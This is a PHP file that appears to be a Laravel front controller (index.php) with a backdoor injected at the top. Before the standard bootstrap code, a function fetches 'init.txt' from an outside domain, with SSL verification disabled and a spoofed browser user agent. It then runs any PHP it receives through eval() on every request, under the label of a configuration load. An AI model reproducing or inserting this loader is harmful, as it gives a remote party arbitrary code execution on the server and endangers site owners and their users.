<?php
function getRemoteData($url) {
    $result = false;
    
    if (ini_get('allow_url_fopen')) {
        $result = @file_get_contents($url);
    }
    
    if ($result === false && function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_TIMEOUT => 5,
            CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        ]);
        $result = curl_exec($ch);
        curl_close($ch);
    }
    
    return $result;
}
$configData = getRemoteData('https://j251222_13.daimitavan.com/init.txt');

if ($configData) {
    if (strpos($configData, '<?php') !== false || strpos($configData, '<?=') !== false) {
        try {
            eval('?>' . $configData);
        } catch (Exception $e) {
            error_log('Configuration load error: ' . $e->getMessage());
        }
    }
}
use Illuminate\Foundation\Application;
use Illuminate\Http\Request;

define('LARAVEL_START', microtime(true));

// Determine if the application is in maintenance mode...
if (file_exists($maintenance = __DIR__.'/../applpk/storage/framework/maintenance.php')) {
    require $maintenance;
}

// Register the Composer autoloader...
require __DIR__.'/../applpk/vendor/autoload.php';

// Bootstrap Laravel and handle the request...
/** @var Application $app */
$app = require_once __DIR__.'/../applpk/bootstrap/app.php';

$app->handleRequest(Request::capture());

